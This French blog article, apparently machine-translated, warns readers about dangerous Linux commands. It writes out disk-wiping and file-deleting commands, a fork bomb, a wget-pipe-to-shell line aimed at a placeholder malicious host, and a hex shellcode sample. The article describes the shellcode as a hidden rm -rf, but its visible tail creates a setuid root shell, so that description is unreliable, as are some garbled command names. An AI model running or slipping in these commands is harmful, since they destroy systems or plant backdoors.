L’interface de ligne de commande est un utilitaire puissant et pratique pour administrer un système Linux. Il fournit un moyen rapide et polyvalent d’exécuter le système, en particulier lors de la gestion de systèmes sans tête qui n’ont pas d’interface graphique.

Bien qu’utile pour gérer votre système, la ligne de commande comporte de nombreux risques. L’exécution de mauvaises commandes peut causer des dommages et des dommages irréparables à votre système. Dans ce guide, nous avons compilé une liste de certaines des commandes les plus risquées que vous ne devriez pas penser à exécuter sur votre système.

1. rm -rf / Commande

La commande rm est une commande Linux utilisée pour supprimer des fichiers et des répertoires en fonction des arguments utilisés. Cependant, il convient d’être extrêmement prudent lors de l’utilisation du rm commande car une légère faute de frappe ou une erreur peut entraîner des dommages irrécupérables au système.

Lorsqu’il est exécuté en tant que root avec le -rf / option, la commande supprime de manière récursive tous les fichiers et répertoires de votre système à partir de la racine (/) qui est le plus élevé dans la structure hiérarchique des fichiers Linux. En un mot, le rm -rf / commande efface complètement votre système résultant en un système cassé et irrécupérable.

Certaines des options utilisées avec le commande rm sommes.

Publicité
  • rm La commande sous Linux est utilisée pour supprimer des fichiers.
  • rm-r La commande supprime le dossier de manière récursive, même le dossier vide.
  • rm-f La commande supprime ‘Fichier en lecture seule’ sans demander.
  • rm-rf / : Force la suppression de tout dans le répertoire racine.
  • rm -rf * : Force la suppression de tout dans le répertoire courant/répertoire de travail.
  • rm -rf . : Force la suppression du dossier et des sous-dossiers actuels.

En fait, lorsque vous exécutez la commande en tant qu’utilisateur régulier, vous obtiendrez deux avertissements sur le terminal.

Exemple De Commande Linux Rm
Exemple De Commande Linux Rm
Exemple De Commande Linux Rm

Pour surmonter la suppression accidentelle de fichiers par le ‘rm‘, créez un alias de la ‘rm’ commande comme ‘rm -i’ dans le « .bashrc » fichier, il vous demandera de confirmer chaque suppression.

2. :(){:|:&}; : Commande

Ce qui précède est en fait une bombe à fourche. Il fonctionne en créant une fonction appelée ':', qui s’appelle deux fois, une fois au premier plan et une fois en arrière-plan. La fonction s’exécute à plusieurs reprises et, ce faisant, consomme toutes les ressources système, ce qui entraîne un plantage du système.

En fait, une commande de fork bomb est essentiellement une forme d’attaque DoS (Denial-of-Service). Il est également appelé virus Wabbit ou Rabbit. Le pire, c’est que vous n’avez pas besoin d’être root pour lancer cette attaque.

Heureusement, vous pouvez vous protéger de cette attaque en limitant le nombre de processus exécutés par les utilisateurs locaux à environ 4000.

Vous pouvez le faire en exécutant la commande :

$ ulimit -S -u 4000

Vous pourrez le vérifier ultérieurement à l’aide de la commande :

$ ulimit -u
Augmenter La Limite De Fichiers Ouverts Sous Linux
Augmenter La Limite De Fichiers Ouverts Sous Linux
Augmenter La Limite De Fichiers Ouverts Sous Linux

3. commande > /dev/sda

Exécution d’une commande suivie de >/dev/sda écrase le /dev/sda bloquer sur votre disque dur. Ce bloc contient des données de système de fichiers et lorsqu’il est écrasé, il en résulte un système endommagé irrécupérable.

4. dossier mv /dev/null

Une autre opération nuisible que vous ne devriez pas essayer consiste à déplacer un répertoire ou un fichier vers /dev/null. La /dev/null file est un type spécial de fichier connu sous le nom de périphérique nul ou « le trou noir“. Tout ce qui est déplacé vers /dev/null est jeté et détruit.

La commande suivante déplace tout le contenu du répertoire personnel de l’utilisateur vers /dev/nullsupprimant par conséquent toutes les données contenues dans le répertoire personnel de l’utilisateur

# mv /home/user/* /dev/null

5. wget http://source_malveillante -O- | sh

La commande wget est une commande qui télécharge des fichiers à partir d’un serveur Web ou de fichiers. La commande ci-dessus télécharge un script à partir d’une source malveillante, puis l’exécute.

6. mkfs.ext3 /dev/sda

La mkfs La commande crée un nouveau système de fichiers (ext2, ext3, ext4, etc.) sur un périphérique de stockage formaté, dans la plupart des cas une partition d’un disque dur. Exécution de la mkfs La commande sur une partition efface toutes les données qui y sont stockées.

Bien qu’utile pour formater des partitions de disque, formater un lecteur entier (tel que mkfs.ext3 /dev/sda) plante le système et le laisse dans un état irrécupérable. Cela se produit car il détruit tous les fichiers système à côté de vos données personnelles.

La commande peut également prendre d’autres formes comme indiqué ci-dessous.

# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda

7. > fichier Commande

La > file efface le contenu d’un fichier et le laisse vide. Il est synonyme de cat /dev/null > fichier commande. Il convient donc d’être prudent lors de l’utilisation des opérateurs de redirection dans un système Linux.

Vous trouverez ci-dessous une démonstration de la façon dont cette commande écrase un fichier texte. Vous pouvez imaginer le désastre que cette commande provoquerait lorsque le fichier impliqué est un fichier de configuration.

Exemple De Commande D'Opérateur De Redirection
Exemple De Commande D'Opérateur De Redirection
Exemple De Commande D’opérateur De Redirection

8. ^foo^bar

La ^foo^bar La commande est aussi dangereuse qu’utile selon la façon dont elle est exécutée. Bien qu’il vous permette de modifier les commandes précédemment exécutées et de les exécuter à nouveau, cela peut être désastreux si vous n’êtes pas intéressé par les modifications apportées aux commandes avant de les exécuter.

9. jj if=/dev/random of=/dev/sda

La commande ci-dessus efface le /dev/sda bloc et écrit des données indésirables aléatoires dans le bloc. Votre système serait laissé à un stade incohérent et irrécupérable.

10. Chmod-R 777 /

Bien qu’il ne plante pas immédiatement votre système Linux, le chmod -R 777 / La commande attribue de manière récursive toutes les autorisations (lecture, écriture et exécution) à tous les fichiers de votre système Linux à partir de la racine.

Cela expose efficacement tous les fichiers de configuration critiques et autres fichiers à tous les utilisateurs, ce qui pose un énorme risque de sécurité pour votre système. Toute personne ayant des intentions néfastes peut bricoler des fichiers cruciaux et casser facilement votre système.

11. La commande cachée

La commande ci-dessous n’est rien d’autre que la première commande ci-dessus (rm -rf). Ici, les codes sont cachés en hexadécimal afin qu’un utilisateur ignorant puisse être trompé. L’exécution du code ci-dessous dans votre terminal effacera votre partition racine.

Cette commande montre ici que la menace peut parfois être masquée et normalement non détectable. Vous devez être conscient de ce que vous faites et du résultat. Ne compilez/n’exécutez pas de codes provenant d’une source inconnue.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Noter: N’exécutez aucune des commandes ci-dessus dans votre Linux terminal ou shell ou sur l’ordinateur de votre ami ou de l’école. Si vous souhaitez les tester, exécutez-les sur une machine virtuelle.

Toute incohérence ou perte de données, due à l’exécution de la commande ci-dessus, entraînera la panne de votre système. Auteur de l’article ni Tecmint est responsable.

C’est tout pour le moment. Je serai bientôt de retour avec un autre article intéressant que vous allez adorer lire. Jusque-là Restez à l’écoute et connecté à Tecmint.

Si vous en connaissez d’autres du genre Commandes Linux dangereuses et vous souhaitez que nous les ajoutions à la liste, veuillez nous en informer via la section des commentaires, et n’oubliez pas de donner vos précieux commentaires.

Si vous appréciez ce que nous faisons ici sur TecMint, vous devriez considérer :

TecMint est le site communautaire à la croissance la plus rapide et le plus fiable pour tout type d’articles, de guides et de livres Linux sur le Web. Des millions de personnes visitent TecMint ! pour rechercher ou parcourir les milliers d’articles publiés accessibles GRATUITEMENT à tous.

Si vous aimez ce que vous lisez, pensez à nous acheter un café (ou 2) en signe d’appréciation.

Soutenez-Nous

Nous sommes reconnaissants pour votre soutien sans fin.

Rate this post
Publicité
Article précédentLes entreprises kenyanes frappées alors que la guerre des talents de Microsoft et Google augmente les salaires
Article suivantTous les personnages d’Omega Strikers (mis à jour)
Avatar
Violette Laurent est une blogueuse tech nantaise diplômée en communication de masse et douée pour l'écriture. Elle est la rédactrice en chef de fr.techtribune.net. Les sujets de prédilection de Violette sont la technologie et la cryptographie. Elle est également une grande fan d'Anime et de Manga.

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici